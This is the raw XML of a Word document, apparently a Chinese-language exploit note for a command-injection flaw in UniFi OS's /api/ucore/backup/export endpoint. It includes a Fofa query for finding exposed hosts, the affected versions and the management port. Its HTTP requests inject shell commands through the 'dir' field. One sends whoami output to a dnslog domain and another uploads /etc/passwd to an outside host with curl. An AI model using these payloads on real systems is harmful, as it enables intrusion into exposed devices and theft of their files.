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6A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Fofa：body="UniFi OS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC10232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F000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影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD7E17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="212427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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212427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="212427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">UniF &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="212427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4.0.21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F73BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="212427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588122AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="E54C5E" w:themeColor="accent6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19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Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="E54C5E" w:themeColor="accent6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>PS:需使用固定端口9780访问管理api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DFCDE8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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12427"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6C55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/api/ucore/backup/export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74FC03CC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:9780</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF3AB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3D8E86"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E408F5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</w:p>
    <w:p w14:paraId="4F9DD48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Content-Length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73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F817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49BC69B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E17408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"dir"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"/tmp/3sdqd-; curl http://`whoami`.ebdbfv.dnslog.cn/; #"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6777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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BA9B23">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342A0129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Dns外带命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0564321B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259070" cy="1241425"/>
            <wp:effectExtent l="0" t="0" r="1778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344D1">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="192278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85631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/api/ucore/backup/export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38F645B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269E5C0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3D8E86"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3850EEB4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</w:p>
    <w:p w14:paraId="64F60B27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Content-Length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73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01181E81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706B6992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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4245A1FF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639300"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"dir"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>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9C6CFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"/tmp/catchify-; curl -s --data-binary @/etc/passwd http://pwqlsntnsi.zaza.eu.org/; #"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0713D1A6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C331046">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:bidi w:val="0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875665"/>
            <wp:effectExtent l="0" t="0" r="952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48EC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2110105"/>
            <wp:effectExtent l="0" t="0" r="1460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2FD6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BD53D1"/>
    <w:rsid w:val="3CD97EDB"/>
    <w:rsid w:val="43A75D32"/>
    <w:rsid w:val="5D211424"/>
    <w:rsid w:val="5F80583A"/>
    <w:rsid w:val="642B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7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116</Words>
  <Characters>580</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>45</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>623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2025-11-06T06:02:00Z</dcterms:created>
  <dc:creator>xsy</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:30:36Z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D0A116FF65B14DA8A4E0B41AEB099D47_12</vt:lpwstr>
  </property>
</Properties>
</file>